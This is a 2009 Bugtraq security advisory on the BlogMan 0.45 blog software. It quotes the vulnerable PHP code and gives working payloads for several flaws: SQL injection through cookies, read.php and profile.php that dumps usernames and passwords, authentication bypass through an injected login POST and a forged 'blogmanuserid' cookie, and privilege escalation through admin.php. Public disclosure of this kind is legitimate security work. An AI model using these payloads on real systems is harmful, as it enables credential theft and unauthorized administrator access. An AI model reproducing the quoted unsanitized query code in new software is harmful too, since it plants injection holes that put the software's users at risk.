BlogMan 0.45 Multiple Vulnerabilities
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: BlogMan 0.45 Multiple Vulnerabilities
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Sun, 1 Mar 2009 16:47:38 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=XnqPAD5tSw9OU+OmXGaz62kZaIpBEPZGtITu5zQ6uYY=; b=Bf7FpZUOigePldo2wbSAeNgh4SF59NJ2oow309W2+HaYuzvefTB8iM2Z/PLtvx0tg7 0v8wf+6YpgY8XG446wpg/gEJ51RlhGvIzKXpDOQ6F6HEmlf0d0kgCshi1uCtJNlK5whn AORn2bnFU0Lcx2nBoseF9R4J3G6O3nfVTm1J4=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=FMEh87GsvYD6ovBc5dZGq8EFzfMqSi53UUZBQvcAoTcVufuBGgDzK3vW+GvwOavTCS Ka8yjPBcKgpYpHHEqDZgBhChMxNW+aOgGqE2o+kkPeRvIkLY46dvvRjgMSjlKQb7/fHv UIWfmfxWT+y8DQsnyXjsbI4waeryAHZIZ9Y4I=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
Application: BlogMan
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
* Authentication Bypass
* Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
- BUGS
This blog is entirely vulnerable to SQL Injection.
The following are vulnerable queries that can be used
to obtain reserved information.
#[1] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: index.php, register.php, viewall.php
The following lines are improperly checked:
/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = "SELECT * FROM user WHERE UserID='".$id."'";
$user = mysql_fetch_array(mysql_query($query)) or
die(mysql_error());
echo "<p class='loginusername'><a
href='edit.php?id=".$id."'>".$user['UserName']."</a></p>\n";
*/
Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:
Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/
#[2] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: read.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23
#[3] SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: profile.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23
#[1] Authentication Bypass:
Requisites: magic_quotes_gpc = off
File affected: doLogin.php
The following lines are improperly checked:
/*
$un = $_POST['un'];
$pw = $_POST['pw'];
...
$pwHashed = mysql_fetch_array(mysql_query("SELECT
PASSWORD('".$pw."')"));
$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user
WHERE
UserName='".$un."'"));
if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
$expires = time() + 3*24*60*60;
setcookie("blogmanuserid", $userRow['UserID'], $expires);
}
*/
Using a SQL Injection bug it is possible to bypass
conditions and to set an arbitrary UserID value.
The following information must be sent using
POST method to doLogin.php
un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass
The First value is UserID, the third value is the password,
the tenth value is UserDisabled and the eleventh value is
UserActive.
#[2] Authentication Bypass:
Requisites: none
File affected: all
It is possible to bypass the authentication
system by creating a cookie named 'blogmanuserid',
and inserting the value of a registered user id
into the content(sometimes 1 for admin):
Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/
Privilege Escalation:
Requisites: magic_quotes_gpc = off
File affected: admin.php
It is possible to escalate privileges using
a SQL Injection bug through a cookie.
The following lines are improperly checked:
/*
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserID='".$id."'"));
if (!$user['UserCanAdmin']) {
echo "<meta http-equiv='refresh'
content='0;index.php'></head></html>";
} else {
...
}
*/
Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/
The first value is UserID and the last value
is UserCanAdmin.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351